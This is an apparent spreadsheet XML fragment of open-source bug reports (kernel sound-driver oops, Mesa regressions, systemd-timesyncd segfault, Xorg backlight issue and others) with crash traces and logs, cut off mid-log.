[  398.616893] Modules linked in: snd_hda_codec_hdmi i915 snd_hda_intel(-) snd_hda_codec x86_pkg_temp_thermal intel_powerclamp coretemp snd_hwdep snd_hda_core crct10dif_pclmul lpc_ich snd_pcm mei_me mei crc32_pclmul ghash_clmulni_intel r8169 mii
[  398.616907] CPU: 0 PID: 6795 Comm: rmmod Tainted: G     U          4.5.0-rc3-gfxbench+ #1
[  398.616911] Hardware name: Gigabyte Technology Co. Ltd. H87M-D3H/H87M-D3H BIOS F11 08/18/2015
[  398.616914] task: ffff8800d8a10000 ti: ffff8800c0ed4000 task.ti: ffff8800c0ed4000
[  398.616916] RIP: 0010:[]  [] snd_jack_report+0x29/0x110
[  398.616933] RSP: 0018:ffff8800c0ed79e0  EFLAGS: 00010246
[  398.616935] RAX: 6b6b6b6b6b6b6b6b RBX: 6b6b6b6b6b6b6b63 RCX: 0000000000000000
[  398.616937] RDX: 0000000000000000 RSI: 0000000000000014 RDI: ffff8800d8980410
[  398.616939] RBP: ffff8800c0ed7a00 R08: 0000000000000001 R09: 0000000000000000
[  398.616942] R10: 0000000000ffff0a R11: 0000000000000005 R12: ffff8800d8980410
[  398.616944] R13: 0000000000000014 R14: ffff88020fb82290 R15: ffff88020f8d2478
[  398.616947] FS:  00007f095f01f700(0000) GS:ffff88021e200000(0000) knlGS:0000000000000000
[  398.616950] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  398.616953] CR2: 0000559ee9a31338 CR3: 00000000d6659000 CR4: 00000000001406f0
[  398.616956] Stack:
[  398.616958]  ffff88020f8d2148 ffff88020d7c5e18 ffff88020d7c5cd0 ffff88020fb82290
[  398.616963]  ffff8800c0ed7a60 ffffffffa0024706 ffff8800c0ed7a20 ffffffff810df8b1
[  398.616968]  ffff880000000020 ffff8800d8980410 ffff88020d7c5eb8 0000000000000001
[  398.616973] Call Trace:
[  398.616978]  [] hdmi_present_sense+0x136/0x390 [snd_hda_codec_hdmi]
[  398.616994]  [] ? rcu_read_lock_sched_held+0x81/0x90
[  398.616999]  [] ? hda_call_codec_resume+0x110/0x110 [snd_hda_codec]
[  398.617004]  [] generic_hdmi_resume+0x48/0x60 [snd_hda_codec_hdmi]
[  398.617010]  [] hda_call_codec_resume+0xb5/0x110 [snd_hda_codec]
[  398.617015]  [] hda_codec_runtime_resume+0x30/0x50 [snd_hda_codec]
[  398.617021]  [] __rpm_callback+0x2d/0x70
[  398.617024]  [] ? hda_call_codec_resume+0x110/0x110 [snd_hda_codec]
[  398.617029]  [] rpm_callback+0x1f/0x80
[  398.617033]  [] ? hda_call_codec_resume+0x110/0x110 [snd_hda_codec]
[  398.617047]  [] rpm_resume+0x4cf/0x7c0
[  398.617051]  [] __pm_runtime_resume+0x4a/0x80
[  398.617055]  [] __device_release_driver+0x37/0x140
[  398.617059]  [] device_release_driver+0x20/0x30
[  398.617062]  [] bus_remove_device+0x113/0x190
[  398.617066]  [] device_del+0x134/0x250
[  398.617070]  [] snd_hdac_device_unregister+0x1c/0x20 [snd_hda_core]
[  398.617076]  [] snd_hda_codec_dev_free+0x18/0x30 [snd_hda_codec]
[  398.617080]  [] __snd_device_free+0x24/0x70
[  398.617084]  [] snd_device_free_all+0x2b/0x40
[  398.617087]  [] release_card_device+0x19/0x70
[  398.617091]  [] device_release+0x2d/0x90
[  398.617095]  [] kobject_release+0x7a/0x1a0
[  398.617098]  [] kobject_put+0x27/0x50
[  398.617101]  [] put_device+0x12/0x20
[  398.617104]  [] snd_card_free_when_closed+0x24/0x30
[  398.617107]  [] snd_card_free+0x40/0x60
[  398.617111]  [] azx_remove+0x2c/0x30 [snd_hda_intel]
[  398.617115]  [] pci_device_remove+0x34/0xb0
[  398.617118]  [] __device_release_driver+0x95/0x140
[  398.617122]  [] driver_detach+0xb6/0xc0
[  398.617125]  [] bus_remove_driver+0x53/0xd0
[  398.617128]  [] driver_unregister+0x27/0x50
[  398.617132]  [] pci_unregister_driver+0x25/0x70
[  398.617136]  [] azx_driver_exit+0x10/0x12 [snd_hda_intel]
[  398.617140]  [] SyS_delete_module+0x18f/0x1f0
[  398.617144]  [] entry_SYSCALL_64_fastpath+0x16/0x73
[  398.617147] Code: 00 00 48 85 ff 0f 84 fd 00 00 00 55 48 89 e5 41 56 41 55 41 54 53 41 89 f5 48 8b 47 08 49 89 fc 48 8d 58 f8 48 39 df 74 23 31 d2  85 6b 18 48 8b 33 49 8b 7c 24 18 0f 95 c2 e8 b3 fa ff ff 48
[  398.617176] RIP  [] snd_jack_report+0x29/0x110
[  398.617180]  RSP 
[  398.617185] ---[ end trace 96cae4ed51e405a5 ]---</t>
  </si>
  <si>
    <t>POPPLER-12851</t>
  </si>
  <si>
    <t>Lacking PDF forms i18n support</t>
  </si>
  <si>
    <t>This bug has been reported here:
There's a character encoding problem filling out forms with localized Evince. The Norwegian characters aren't displayed like they should.
The large text field below the text Hvilken vare eller tjeneste klages det pÃ¥? in the test case contains the text Ny bÃ¦rbar PC kjÃ¸pt hos ElkjÃ¸p but this text is rendered as Ny bÃŠrbar PC kjÂ¯pt hos ElkÂ¯p
The wrongly rendered text is what I put in there using the new support for PDF forms in poppler. All other Norwegian characters in the PDF which means the text put in by the form's author (the static text) are rendered correctly.
http://launchpadlibrarian.net/10052805/Klageskjema%20bokmal-1..pdf
http://launchpadlibrarian.net/10052807/evince-print.pdf</t>
  </si>
  <si>
    <t>MESA-92621</t>
  </si>
  <si>
    <t>[G965 ILK G45] Regression: 24 piglit regressions in glsl-1.10</t>
  </si>
  <si>
    <t>The following commit series produced many regressions on older intel hardware:
8ac3b525c77cb5aae9e61bd984b78f6cbbffdc1c - 8cf84a7e470dbd3b46ce4081459d2ecfab22c2d5
Author:     Alejandro PiÃ±eiro 
AuthorDate: Fri Oct 9 18:39:42 2015 +0200
Commit:     Alejandro PiÃ±eiro 
CommitDate: Thu Oct 22 21:58:03 2015 +0200
    i965/vec4: print predicate control at brw_vec4 dump_instruction
    v2: externalize pred_ctrl_align16 from brw_disasm.c instead of adding
        a copy on brw_vec4.c as suggested by Matt Turner
    Reviewed-by: Matt Turner 
The failing tests:
glsl-1_20.execution.clipping.vs-clip-vertex-homogeneity
glsl-1_10.execution.interpolation.interpolation-none-gl_frontsecondarycolor-smooth-vertex
glsl-1_10.execution.interpolation.interpolation-none-gl_backcolor-smooth-vertex
glsl-1_10.execution.clipping.clip-plane-transformation pos_clipvert
glsl-1_10.execution.interpolation.interpolation-none-other-flat-vertex
glsl-1_10.execution.clipping.clip-plane-transformation clipvert_pos
glsl-1_10.execution.interpolation.interpolation-none-gl_backsecondarycolor-smooth-vertex
glsl-1_20.execution.clipping.vs-clip-vertex-const-accept
glsl-1_10.execution.clipping.clip-plane-transformation fixed
glsl-1_20.execution.clipping.vs-clip-vertex-equal-to-position
glsl-1_20.execution.clipping.vs-clip-vertex-enables
glsl-1_20.execution.clipping.fixed-clip-enables !opengl 1_1.user-clip
glsl-1_10.execution.interpolation.interpolation-none-other-smooth-vertex
arb_vertex_program.clip-plane-transformation arb !opengl 1_0.gl-1.0-fpexceptions
glsl-1_10.execution.interpolation.interpolation-none-gl_frontsecondarycolor-flat-vertex
glsl-1_10.execution.interpolation.interpolation-none-gl_backcolor-flat-vertex
glsl-1_10.execution.interpolation.interpolation-none-gl_frontcolor-flat-vertex
glsl-1_20.execution.clipping.vs-clip-vertex-different-from-position
glsl-1_20.execution.clipping.vs-clip-vertex-const-reject
glsl-1_10.execution.interpolation.interpolation-none-gl_frontcolor-smooth-vertex
glsl-1_10.execution.interpolation.interpolation-none-gl_backsecondarycolor-flat-vertex</t>
  </si>
  <si>
    <t>XORG-24595</t>
  </si>
  <si>
    <t>[nv15] screen corruption (color) with latest git</t>
  </si>
  <si>
    <t>Hardware: Geforce 2 GTS
Installed software: Mesa nouveau driver and kernel driver -&gt; all git (20091016)
I think two pictures are worth a thousands words...
nv-driver (good):
http://www.freeimagehosting.net/uploads/2665af90b8.jpg
nouveau-driver (bad):
http://www.freeimagehosting.net/uploads/9cc2e6a842.jpg</t>
  </si>
  <si>
    <t>DRI-99109</t>
  </si>
  <si>
    <t>[SKL] eDP EDID is invalid</t>
  </si>
  <si>
    <t>This happens all the time on a SKL-6700K machine:
[   25.572597] i915 0000:00:02.0: eDP-1: EDID is invalid:
[   25.572599] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572599] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572600] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572600] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572601] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572601] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572602] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   25.572602] 	[00] ZERO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
http://benchsrv.fi.intel.com/archive/results/CI_IGT_test/CI_DRM_1963/fi-skl-6700k/dmesg-before.log</t>
  </si>
  <si>
    <t>LIBREOFFICE-50460</t>
  </si>
  <si>
    <t>Master bug for all color scale and data bar improvements planed for 3.7</t>
  </si>
  <si>
    <t>This bug collects all bug reports for data bars and color scales that will be fixed in 3.7.</t>
  </si>
  <si>
    <t>LIBREOFFICE-68651</t>
  </si>
  <si>
    <t>CRASH - Base wizard crashes on embedded HSQLDB creation</t>
  </si>
  <si>
    <t>Created attachment 84783
Apple crash backtrace
When attempting to create a new ODB with embedded hsqldb as the db engine via the database creation wizard LO crashes consistently on the last step of the wizard where the database gets registered.
The ODB file is created and can subsequently be opened after a restart of LO but any attempt to click on the Tablesbutton causes LO to crash again.
Apple Backtrace included. As this is a non-debug build I have no symbols.
Alex</t>
  </si>
  <si>
    <t>XORG-15010</t>
  </si>
  <si>
    <t>[855GM] Fatal server error: Couldn't bind memory for BO front buffer</t>
  </si>
  <si>
    <t>Created attachment 15116
xorg.0.log
When trying the latest git version of xf86-video-intel (2.3) driver I get a
Fatal server error:
Couldn't bind memory for BO front buffer.
I am using Debian/Sid and kernel 2.6.24-1-686 on a laptop with 82852/855GM Integrated Graphics Device.</t>
  </si>
  <si>
    <t>TELEPATHY-28850</t>
  </si>
  <si>
    <t>Update to spec 0.19.8</t>
  </si>
  <si>
    <t>New interfaces:
â€¢ Account.I.Storage
â€¢ Conn.I.Cellular
New properties:
â€¢ Account.Service
New types:
â€¢ Protocol_Content_Identifier
â€¢ Protocol_Message_Token_List</t>
  </si>
  <si>
    <t>SYSTEMD-83091</t>
  </si>
  <si>
    <t>systemd-timesyncd segfaults when there's no network (systemd-216)</t>
  </si>
  <si>
    <t>Created attachment 105271
backtrace
Commit 874ff7bf4d6fe693542209f127d23cd89adc499b (timesyncd: beef up NTP server selection logic and acquire NTP servers from DHCP) broke systemd-timesyncd when the network is down:
# ip addr show
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s25:  mtu 1500 qdisc pfifo_fast state DOWN group default qlen 1000
    link/ether 00:21:cc:6b:39:02 brd ff:ff:ff:ff:ff:ff
3: wlp3s0:  mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 08:11:96:0b:b3:28 brd ff:ff:ff:ff:ff:ff
# ./systemd-timesyncd
Using NTP server 193.204.114.105:123 (193.204.114.105).
ASAN:SIGSEGV
=================================================================
==8866==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x7fa31ef1ab3d sp 0x7fff51686980 bp 0x7fff51686b90 T0)
    #0 0x7fa31ef1ab3c in manager_connect src/timesync/timesyncd-manager.c:903
    #1 0x7fa31ef315ed in manager_send_request.lto_priv.92 src/timesync/timesyncd-manager.c:203
    #2 0x7fa31ef25e88 in manager_begin.lto_priv.90 src/timesync/timesyncd-manager.c:734
    #3 0x7fa31ef1c32f in manager_resolve_handler src/timesync/timesyncd-manager.c:818
    #4 0x7fa31ef1da6b in res_query_done src/libsystemd/sd-resolve/sd-resolve.c:1265
    #5 0x7fa31ef1da6b in complete_query src/libsystemd/sd-resolve/sd-resolve.c:768
    #6 0x7fa31ef1e75a in handle_response src/libsystemd/sd-resolve/sd-resolve.c:956
    #7 0x7fa31ef1e75a in sd_resolve_process src/libsystemd/sd-resolve/sd-resolve.c:990
    #8 0x7fa31ef20950 in io_callback.lto_priv.96 src/libsystemd/sd-resolve/sd-resolve.c:1380
    #9 0x7fa31ef154f9 in source_dispatch.lto_priv.60 src/libsystemd/sd-event/sd-event.c:2035
    #10 0x7fa31ef2f44f in sd_event_run.constprop.32 src/libsystemd/sd-event/sd-event.c:2333
    #11 0x7fa31ef0ef74 in sd_event_loop src/libsystemd/sd-event/sd-event.c:2352
    #12 0x7fa31ef0ef74 in main src/timesync/timesyncd.c:143
    #13 0x7fa31d132fff in __libc_start_main (/usr/lib/libc.so.6+0x1ffff)
    #14 0x7fa31ef10ceb (/home/dcoppa/Arch/hacking/systemd/src/systemd-216/systemd-timesyncd+0x13ceb)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/timesync/timesyncd-manager.c:903 manager_connect
==8866==ABORTING
I've also attached gdb's backtrace.</t>
  </si>
  <si>
    <t>dcoppa</t>
  </si>
  <si>
    <t>LIBREOFFICE-47843</t>
  </si>
  <si>
    <t>Website Broken Localization</t>
  </si>
  <si>
    <t>The Japanese localization is a dead link:
https://download.documentfoundation.org/libreoffice/stable/3.5.1/mac/x86/LibO_3.5.1_MacOS_x86_langpack_ja.dmg
Not found.</t>
  </si>
  <si>
    <t>drsassafras</t>
  </si>
  <si>
    <t>MESA-40754</t>
  </si>
  <si>
    <t>gallivm is broken with LLVM &gt;r139237</t>
  </si>
  <si>
    <t>Created attachment 51029
patch
r139237 | jamesm | 2011-09-07 21:24:38 +0400 (Wed 07 Sep 2011) | 1 line
Refactor instprinter and mcdisassembler to take a SubtargetInfo. Add -mattr= handling to llvm-mc. Reviewed by Owen Anderson.
Path in the attached file.</t>
  </si>
  <si>
    <t>XORG-662</t>
  </si>
  <si>
    <t>backlight doesn't turn off on dell inspiron 8200</t>
  </si>
  <si>
    <t>Switching to fedora core 2 and hence x.org the backlight will no longer turn
off on my laptop -- though the screen does blank.  I've tried all possible dpms
permuatations and tried both the vesa and nv driver (I have the GeForce4 440
Chipset).  
I've done a lot of googling and it seems that some other people also have the
same problem but no one has found a solution.
Thanks
Reza</t>
  </si>
  <si>
    <t>reza</t>
  </si>
  <si>
    <t>XORG-13857</t>
  </si>
  <si>
    <t>xbacklight sets random brightness</t>
  </si>
  <si>
    <t>Normally xbacklight sets the LCD backlight brightness between 0-100% however this does not work on my nc6120 laptop. Some values result in the expected brightness but some in full brightness.
I did some debugging and found that if the least significiant bit is set in the brightness register it forces full brightness ignoring the upper bits. If it's reset then the upper bits mean the normal pwm value.
So I've did the following hack on the intel driver:
--- i830_lvds.c.old     2007-11-15 22:02:59.000000000 +0400 
+++ i830_lvds.c 2007-12-29 22:05:33.007191783 +0400 
@@ -2367 +2367 @@ 
     blc_pwm_ctl = INREG(BLC_PWM_CTL) 
     blc_pwm_ctl  
-    OUTREG(BLC_PWM_CTL blc_pwm_ctl | (level &lt;&lt; BACKLIGHT_DUTY_CYCLE_SHIFT)) 
+    OUTREG(BLC_PWM_CTL blc_pwm_ctl | ((level  
 } 
 static int 
This always forces the lowest bit to zero and xbacklight is now working as expected. No more flashing but nice smooth brightness change )
Is there anyone who could create a decent patch from this?
My xorg.log (in case it's chipset specific):
X.Org X Server 1.4.0
Release Date: 5 September 2007
X Protocol Version 11 Revision 0
Build Operating System: Linux Debian (xorg-server 2:1.4.1~git20071212-2)
Current Operating System: Linux ax.home 2.6.23.8 #29 PREEMPT Sat Nov 17 21:11:41 GST 2007 i686
Build Date: 22 December 2007  01:30:34AM
	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
Module Loader present
Markers: (--) probed (**) from config file (==) default setting
	(++) from command line (!!) notice (II) informational
	(WW) warning (EE) error (NI) not implemented (??) unknown.
(==) Log file: /var/log/Xorg.1.log Time: Sat Dec 29 21:49:23 2007
(==) Using config file: /etc/X11/xorg.conf
(==) ServerLayout Default Layout
(**) |--&gt;Screen Default Screen (0)
(**) |   |--&gt;Monitor LCD
(**) |   |--&gt;Device intel
(**) |--&gt;Input Device Touchpad
(**) |--&gt;Input Device Escom dvorak keyboard
(**) Option DisableVidModeExtension false
(**) Option AllowNonLocalXvidtune false
(**) Option AllowMouseOpenFail true
(**) Option BlankTime 0
(**) Option StandbyTime 0
(**) Option SuspendTime 5
(**) Option OffTime 10
(==) Automatically adding devices
(==) Automatically enabling devices
(WW) The directory /usr/share/fonts/X11/cyrillic does not exist.
	Entry deleted from font path.
(==) FontPath set to:
	/usr/share/fonts/X11/misc
	/usr/share/fonts/X11/100dpi/:unscaled
	/usr/share/fonts/X11/75dpi/:unscaled
	/usr/share/fonts/X11/Type1
	/usr/share/fonts/X11/100dpi
	/usr/share/fonts/X11/75dpi
	/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType
(==) RgbPath set to /etc/X11/rgb
(==) ModulePath set to /usr/lib/xorg/modules
(**) Extension Composite is enabled
(WW) Ignoring unrecognized extension Render
(II) No default mouse found adding one
(**) |--&gt;Input Device 
(II) Open ACPI successful (/var/run/acpid.socket)
(II) Loader magic: 0x81d85a0
(II) Module ABI versions:
	X.Org ANSI C Emulation: 0.3
	X.Org Video Driver: 2.0
	X.Org XInput driver : 2.0
	X.Org Server Extension : 0.3
	X.Org Font Renderer : 0.5
(II) Loader running on linux
(II) LoadModule: pcidata
(II) Loading /usr/lib/xorg/modules//libpcidata.so
(II) Module pcidata: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 2.0
(--) using VT number 4
(II) PCI: PCI scan (all values are in hex)
(II) PCI: 00:00:0: chip 80862590 card 103c099c rev 03 class 060000 hdr 00
(II) PCI: 00:02:0: chip 80862592 card 103c099c rev 03 class 030000 hdr 80
(II) PCI: 00:02:1: chip 80862792 card 103c099c rev 03 class 038000 hdr 80
(II) PCI: 00:1c:0: chip 80862660 card 00000000 rev 03 class 060400 hdr 81
(II) PCI: 00:1d:0: chip 80862658 card 103c099c rev 03 class 0c0300 hdr 80
(II) PCI: 00:1d:1: chip 80862659 card 103c099c rev 03 class 0c0300 hdr 00
(II) PCI: 00:1d:2: chip 8086265a card 103c099c rev 03 class 0c0300 hdr 00
(II) PCI: 00:1d:3: chip 8086265b card 103c099c rev 03 class 0c0300 hdr 00
(II) PCI: 00:1d:7: chip 8086265c card 103c099c rev 03 class 0c0320 hdr 00
(II) PCI: 00:1e:0: chip 80862448 card 00000000 rev d3 class 060401 hdr 81
(II) PCI: 00:1e:2: chip 8086266e card 103c099c rev 03 class 040100 hdr 00
(II) PCI: 00:1e:3: chip 8086266d card 103c099c rev 03 class 070300 hdr 00
(II) PCI: 00:1f:0: chip 80862641 card 103c099c rev 03 class 060100 hdr 80
(II) PCI: 00:1f:1: chip 8086266f card 103c099c rev 03 class 01018a hdr 00
(II) PCI: 00:1f:3: chip 8086266a card 00000000 rev 03 class 0c0500 hdr 00
(II) PCI: 02:04:0: chip 80864220 card 103c12f6 rev 05 class 028000 hdr 00
(II) PCI: 02:06:0: chip 104c8031 card 30000000 rev 00 class 060700 hdr 82
(II) PCI: 02:06:1: chip 104c8031 card 38000000 rev 00 class 060700 hdr 82
(II) PCI: 02:06:2: chip 104c8032 card 103c099c rev 00 class 0c0010 hdr 80
(II) PCI: 02:06:3: chip 104c8033 card 103c099c rev 00 class 018000 hdr 80
(II) PCI: 02:06:4: chip 104c8034 card 103c099c rev 00 class 080500 hdr 80
(II) PCI: 02:06:5: chip 104c8035 card 103c099c rev 00 class 078000 hdr 80
(II) PCI: 02:0e:0: chip 14e4165e card 103c099c rev 03 class 020000 hdr 00
(II) PCI: End of PCI scan
(II) Intel Bridge workaround enabled
(II) Host-to-PCI bridge:
(II) Bus 0: bridge is at (0:0:0) (0016) BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 0 I/O range:
	[0] -1	0	0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) Bus 0 non-prefetchable memory range:
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
(II) Bus 0 prefetchable memory range:
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
(II) PCI-to-PCI bridge:
(II) Bus 16: bridge is at (0:28:0) (01616) BCTRL: 0x0000 (VGA_EN is cleared)
(II) Subtractive PCI-to-PCI bridge:
(II) Bus 2: bridge is at (0:30:0) (024) BCTRL: 0x0006 (VGA_EN is cleared)
(II) Bus 2 I/O range:
	[0] -1	0	0x00003000 - 0x000030ff (0x100) IX[B]
	[1] -1	0	0x00003400 - 0x000034ff (0x100) IX[B]
	[2] -1	0	0x00003800 - 0x000038ff (0x100) IX[B]
	[3] -1	0	0x00003c00 - 0x00003cff (0x100) IX[B]
(II) Bus 2 non-prefetchable memory range:
	[0] -1	0	0xd0000000 - 0xd03fffff (0x400000) MX[B]
(II) Bus 2 prefetchable memory range:
	[0] -1	0	0x40000000 - 0x47ffffff (0x8000000) MX[B]
(II) PCI-to-ISA bridge:
(II) Bus -1: bridge is at (0:31:0) (0-1-1) BCTRL: 0x0008 (VGA_EN is set)
(II) PCI-to-CardBus bridge:
(II) Bus 3: bridge is at (2:6:0) (233) BCTRL: 0x03c4 (VGA_EN is cleared)
(II) Bus 3 I/O range:
	[0] -1	0	0x00003000 - 0x000030ff (0x100) IX[B]
	[1] -1	0	0x00003400 - 0x000034ff (0x100) IX[B]
(II) Bus 3 prefetchable memory range:
	[0] -1	0	0x40000000 - 0x43ffffff (0x4000000) MX[B]
(II) PCI-to-CardBus bridge:
(II) Bus 4: bridge is at (2:6:1) (247) BCTRL: 0x03c4 (VGA_EN is cleared)
(II) Bus 4 I/O range:
	[0] -1	0	0x00003800 - 0x000038ff (0x100) IX[B]
	[1] -1	0	0x00003c00 - 0x00003cff (0x100) IX[B]
(II) Bus 4 prefetchable memory range:
	[0] -1	0	0x44000000 - 0x47ffffff (0x4000000) MX[B]
(--) PCI:*(0:2:0) Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller rev 3 Mem @ 0xd0400000/19 0xc0000000/28 0xd0480000/18 I/O @ 0x7000/3
(--) PCI: (0:2:1) Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller rev 3 Mem @ 0xd0500000/19
(II) Addressable bus resource ranges are
	[0] -1	0	0x00000000 - 0xffffffff (0x0) MX[B]
	[1] -1	0	0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) OS-reported resource ranges:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[5] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) Active PCI resource ranges:
	[0] -1	0	0xd0020000 - 0xd002ffff (0x10000) MX[B]
	[1] -1	0	0xd0010000 - 0xd0010fff (0x1000) MX[B]
	[2] -1	0	0xd000f000 - 0xd000ffff (0x1000) MX[B]
	[3] -1	0	0xd000e000 - 0xd000efff (0x1000) MX[B]
	[4] -1	0	0xd000d000 - 0xd000dfff (0x1000) MX[B]
	[5] -1	0	0xd000c000 - 0xd000c0ff (0x100) MX[B]
	[6] -1	0	0xd000b000 - 0xd000b0ff (0x100) MX[B]
	[7] -1	0	0xd000a000 - 0xd000a0ff (0x100) MX[B]
	[8] -1	0	0xd0008000 - 0xd0009fff (0x2000) MX[B]
	[9] -1	0	0xd0004000 - 0xd0007fff (0x4000) MX[B]
	[10] -1	0	0xd0003000 - 0xd00037ff (0x800) MX[B]
	[11] -1	0	0xd0000000 - 0xd0000fff (0x1000) MX[B]
	[12] -1	0	0xd0582000 - 0xd05820ff (0x100) MX[B]
	[13] -1	0	0xd0581000 - 0xd05811ff (0x200) MX[B]
	[14] -1	0	0xd0580000 - 0xd05803ff (0x400) MX[B]
	[15] -1	0	0xd0500000 - 0xd057ffff (0x80000) MX[B](B)
	[16] -1	0	0xd0480000 - 0xd04bffff (0x40000) MX[B](B)
	[17] -1	0	0xc0000000 - 0xcfffffff (0x10000000) MX[B](B)
	[18] -1	0	0xd0400000 - 0xd047ffff (0x80000) MX[B](B)
	[19] -1	0	0x00001200 - 0x0000121f (0x20) IX[B]
	[20] -1	0	0x00002580 - 0x0000258f (0x10) IX[B]
	[21] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[22] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[23] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[24] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[25] -1	0	0x00002500 - 0x0000257f (0x80) IX[B]
	[26] -1	0	0x00002400 - 0x000024ff (0x100) IX[B]
	[27] -1	0	0x00002200 - 0x0000223f (0x40) IX[B]
	[28] -1	0	0x00002100 - 0x000021ff (0x100) IX[B]
	[29] -1	0	0x00002060 - 0x0000207f (0x20) IX[B]
	[30] -1	0	0x00002040 - 0x0000205f (0x20) IX[B]
	[31] -1	0	0x00002020 - 0x0000203f (0x20) IX[B]
	[32] -1	0	0x00002000 - 0x0000201f (0x20) IX[B]
	[33] -1	0	0x00007000 - 0x00007007 (0x8) IX[B](B)
(II) Active PCI resource ranges after removing overlaps:
	[0] -1	0	0xd0020000 - 0xd002ffff (0x10000) MX[B]
	[1] -1	0	0xd0010000 - 0xd0010fff (0x1000) MX[B]
	[2] -1	0	0xd000f000 - 0xd000ffff (0x1000) MX[B]
	[3] -1	0	0xd000e000 - 0xd000efff (0x1000) MX[B]
	[4] -1	0	0xd000d000 - 0xd000dfff (0x1000) MX[B]
	[5] -1	0	0xd000c000 - 0xd000c0ff (0x100) MX[B]
	[6] -1	0	0xd000b000 - 0xd000b0ff (0x100) MX[B]
	[7] -1	0	0xd000a000 - 0xd000a0ff (0x100) MX[B]
	[8] -1	0	0xd0008000 - 0xd0009fff (0x2000) MX[B]
	[9] -1	0	0xd0004000 - 0xd0007fff (0x4000) MX[B]
	[10] -1	0	0xd0003000 - 0xd00037ff (0x800) MX[B]
	[11] -1	0	0xd0000000 - 0xd0000fff (0x1000) MX[B]
	[12] -1	0	0xd0582000 - 0xd05820ff (0x100) MX[B]
	[13] -1	0	0xd0581000 - 0xd05811ff (0x200) MX[B]
	[14] -1	0	0xd0580000 - 0xd05803ff (0x400) MX[B]
	[15] -1	0	0xd0500000 - 0xd057ffff (0x80000) MX[B](B)
	[16] -1	0	0xd0480000 - 0xd04bffff (0x40000) MX[B](B)
	[17] -1	0	0xc0000000 - 0xcfffffff (0x10000000) MX[B](B)
	[18] -1	0	0xd0400000 - 0xd047ffff (0x80000) MX[B](B)
	[19] -1	0	0x00001200 - 0x0000121f (0x20) IX[B]
	[20] -1	0	0x00002580 - 0x0000258f (0x10) IX[B]
	[21] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[22] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[23] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[24] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[25] -1	0	0x00002500 - 0x0000257f (0x80) IX[B]
	[26] -1	0	0x00002400 - 0x000024ff (0x100) IX[B]
	[27] -1	0	0x00002200 - 0x0000223f (0x40) IX[B]
	[28] -1	0	0x00002100 - 0x000021ff (0x100) IX[B]
	[29] -1	0	0x00002060 - 0x0000207f (0x20) IX[B]
	[30] -1	0	0x00002040 - 0x0000205f (0x20) IX[B]
	[31] -1	0	0x00002020 - 0x0000203f (0x20) IX[B]
	[32] -1	0	0x00002000 - 0x0000201f (0x20) IX[B]
	[33] -1	0	0x00007000 - 0x00007007 (0x8) IX[B](B)
(II) OS-reported resource ranges after removing overlaps with PCI:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[5] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) All system resource ranges:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0xd0020000 - 0xd002ffff (0x10000) MX[B]
	[5] -1	0	0xd0010000 - 0xd0010fff (0x1000) MX[B]
	[6] -1	0	0xd000f000 - 0xd000ffff (0x1000) MX[B]
	[7] -1	0	0xd000e000 - 0xd000efff (0x1000) MX[B]
	[8] -1	0	0xd000d000 - 0xd000dfff (0x1000) MX[B]
	[9] -1	0	0xd000c000 - 0xd000c0ff (0x100) MX[B]
	[10] -1	0	0xd000b000 - 0xd000b0ff (0x100) MX[B]
